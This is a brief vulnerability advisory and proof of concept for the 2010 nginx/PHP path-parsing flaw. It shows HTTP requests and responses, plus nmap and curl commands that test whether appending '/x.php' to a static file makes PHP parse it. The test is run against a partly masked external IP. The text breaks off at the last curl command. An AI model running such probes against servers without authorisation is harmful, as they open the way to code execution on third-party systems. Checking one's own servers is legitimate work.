Please check your server.
<a href="http://www.80sec.com/nginx-securit.html">http://www.80sec.com/nginx-securit.html</a>
<a href="http://www.80sec.com/iis-cgifastcgi-security-hol.html">http://www.80sec.com/iis-cgifastcgi-security-hol.html</a>
PoC:
Request http://testsite/robots.txt
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes
Request http://testsite/robots.txt/80sec.php
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
The change in Content-Type shows that the backend responsible for parsing the request has changed; such a site is likely vulnerable.
Demo:
pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205
Interesting ports on 218.xx.xx.205:
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx web server 0.8.15
pentest@ubuntu:~$ curl --head http://218.xx.xx.205/images/intro.png -# | grep "Content-Type"
0.0%
Content-Type: image/png
pentest@ubuntu:~$ curl --head http://218.xx.xx.205/images/intro.png/test.php -# | grep "Content-Type"